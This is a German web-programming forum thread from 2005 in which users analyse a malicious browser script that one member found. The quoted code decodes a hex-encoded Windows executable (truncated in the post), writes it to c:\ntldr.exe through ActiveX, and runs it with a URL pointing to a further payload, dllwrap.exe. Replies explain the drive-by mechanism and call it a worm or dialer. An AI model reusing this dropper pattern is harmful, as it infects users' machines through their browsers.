wozu die Schleife ?

Diskutiere mit über: wozu die Schleife ? im Web-Programmierung Forum

  1. etrance

    etrance Thread Starter MacUser Mitglied

    Beiträge:
    141
    Zustimmungen:
    0
    Registriert seit:
    08.08.2004
    kann jemand mir erklären wie die schleife funktioniert ? habe zufällig
    bei sürfen auf Desktop bekommt ...wäre unter Windows wahrscheinlich
    zum ausführen gekommen :)

    <script language=vbscript>
    c0 = "4D5A90000300000004000000504500004C01020046534721..sehr lang noch :) .."
    h0 = ""
    i = 1
    Do While i < Len(c0)
    c = chr(cint("&h" & mid(c0, i, 2)))
    h0 = h0 & c
    i = i + 2
    Loop
    </script>
     
  2. Stan Marsh

    Stan Marsh MacUser Mitglied

    Beiträge:
    243
    Zustimmungen:
    12
    Registriert seit:
    05.02.2005
    Falsches Forum, du bist hier in PHP nicht in VB ;)

    Die Schleife: Während i kleiner als Len(c0) (kenne mich mit VB nicht aus, wird wohl Zeichenkettenlänge sein oder so) ist, wird die Schleife ausgeführt.
     
  3. oSIRus

    oSIRus MacUser Mitglied

    Beiträge:
    2.721
    Zustimmungen:
    0
    Registriert seit:
    16.09.2004
    also ich denke mal das dient primär dazu deinen rechner auszubremsen.
     
  4. SaC

    SaC MacUser Mitglied

    Beiträge:
    386
    Zustimmungen:
    0
    Registriert seit:
    10.10.2004
    Irgendwie wird da die Zeichenkette c0 zerschnipselt und dann in der Variable h0 wieder zusammengesetzt. Fragt mich aber nicht was für einen Sinn das haben soll...
     
  5. etrance

    etrance Thread Starter MacUser Mitglied

    Beiträge:
    141
    Zustimmungen:
    0
    Registriert seit:
    08.08.2004
    ich kenne mit Scripten nicht aus aber ist es so einfach eine SystemObject zuerzeugen und dann auszuführen ?
    Die PHP Datei was ich bekomme habe sind noch mehr drin habe nur ausschnitt gepostet.
    Wenn ich richtig den code verstanden habe ist dass ein Textfile mit den Endung .exe erzeugen können :( und mit code gefuttet wird

    var fs = new ActiveXObject('Scripting.FileSystemObject');
    var ts = fs.CreateTextFile("c:\\ntldr.exe", true, false);
    ts.Write(h0);
    ts.Close();
    var wsh = new ActiveXObject('WScript.Shell');
    wsh.Run("c:\\ntldr.exe http://www.foxik.com/hb/dllwrap.exe",0);
    window.close();

    nach Info im Internet ist es ein Wurm. Was macht wohl dllwrap.exe ?? hätte gern jetzt VPC um es zuprobieren
     
  6. SaC

    SaC MacUser Mitglied

    Beiträge:
    386
    Zustimmungen:
    0
    Registriert seit:
    10.10.2004
    Das ist wohlgemerkt kein PHP, sondern VisualBasic Script, eine von MS entwickelte Skriptsprache, die primär dazu dient Sicherheitslücken zu öffnen :D

    Damit das Ding funktioniert muss man
    a) Windows benutzen
    b) mit dem IE surfen
    c) die Sicherheitseinstellungen auf einem SEHR niedrigen Level haben

    Du hast den Code richtig verstanden. Es wird eine Datei direkt am Laufwerk C mit dem Namen "ntldr.exe" erzeugt.
    In die wird dann der Inhalt des oben erzeugten Strings geschrieben (ist das Hex oder was?)
    Offenbar ist die Datei dazu bestimmt auf dem Windows Scripting Host (WSH) ausgeführt zu werden.
    Beim ausführen (wsh.Run) wird ihr zusätzlich eine Webadresse als Parameter übergeben. Wahrscheinlich holt sich das Programm von dort dann die "dllwrap.exe" auf die Festplatte. Möglicherweise werden so einige der Systembibliotheken (DLLs) ersetzt - reine Vermutung.

    So, ich hoffe das war wenigstens ein Bisschen informativ :D
    Für Fehler übernehme ich keine Haftung weil es schon ewig her ist, dass ich unter Windows was programmiert hab (und überhaupt unter VB - is ja ekelhaft :p)
     
    Zuletzt bearbeitet: 08.02.2005
  7. etrance

    etrance Thread Starter MacUser Mitglied

    Beiträge:
    141
    Zustimmungen:
    0
    Registriert seit:
    08.08.2004
    so schleudern die also ihre Würmer ..läst javascript oder sogar JAva auch so leicht ausführtbare Files auf Locale Platte erzeugern? (OS X)

    Gruss etrance
     
  8. Hilarious

    Hilarious MacUser Mitglied

    Beiträge:
    2.195
    Zustimmungen:
    5
    Registriert seit:
    25.11.2004
    JavaScript und Java haben zwar einige kleinere Gemeinsamkeiten, aber JavaScript wurde hauptsächlich aus Marketinggründen seinerzeit so getauft. Sun wollte damals die plattformübergreifende, objektorientierte (das war Anfang der 90er irre hip) Programmiersprache Java nach vorn bringen. Eine ursprünglich vielversprechende Sache, stellte sich jedoch schnell heraus, dass Java für die Integration in einem Netscape-Browser den Rahmen ein wenig gesprengt hätte.

    Daher musste JavaScript (oder besser ECMA-Script) herhalten, ein wenig Dynamik in die zustandslosen Darstellungen von Text per HTML zu bringen. Zu Deiner Beruhigung: Im Prinzip ist es mit reinem JavaScript nicht ohne Weiteres möglich, lokale Dateien beliebigen Inhaltes auf der Festplatte des Nutzers zu schreiben, da das oberste Objekt, was JavaScript kennt und "sieht", das Browserfenster ist. Eine Festplatte ist da gar nicht in "Sicht".

    Dann kam Redmond mit ActiveX-Controls, VBScript und dem ganzen Kram, um genau die oben beschriebene Hürde zu überspringen. Mit ActiveX-Controls kann der Programmierer so gut wie alles, was das Betriebssystem auch kann. Zwar gibt es einige Sicherheitsbeschränkungen, aber diese sind immer erst Monate nach den jeweiligen Meldungen erschienen und gleichen Leukoplast auf offenen Knochenbrüchen.

    Jetzt die gute Nachricht: Diese Form der Active-X-Controls, die so tief Zugriff auf die Hardware ermöglichen, gibt es nur in Verbindung mit Windows-Systemen.
     
  9. oSIRus

    oSIRus MacUser Mitglied

    Beiträge:
    2.721
    Zustimmungen:
    0
    Registriert seit:
    16.09.2004
    Java braucht für Zugriffe auf lokale Ressourcen immer ein Sicherheitszertifikat, was vom user akzeptiert werden muß.
     
  10. michanismus

    michanismus MacUser Mitglied

    Beiträge:
    434
    Zustimmungen:
    0
    Registriert seit:
    23.08.2004
    das ist ein dialer! das skript ist sicher noch ein paar zeilen umfangreicher, denke ich...
    auf jeden fall wird auf deriner platte (falls du windows user bist und das erlaubt hast)
    eine datei geschrieben (der dialer) und ausgeführt. der lange string dort sind hex codes, welche den exakten kompilierten programmcode wiederspiegeln. so machen das die skript kiddies um an einigen älteren antiviren programmen vorbeizukommen.
     
Die Seite wird geladen...
Ähnliche Themen - wozu Schleife Forum Datum
foreach() in while Schleife? Web-Programmierung 18.12.2010
if-Schleife in GB-Abfrage einbauen Web-Programmierung 17.12.2006
höchsten Wert einer for Schleife ermitteln Web-Programmierung 20.08.2006

Diese Seite empfehlen

Benutzerdefinierte Suche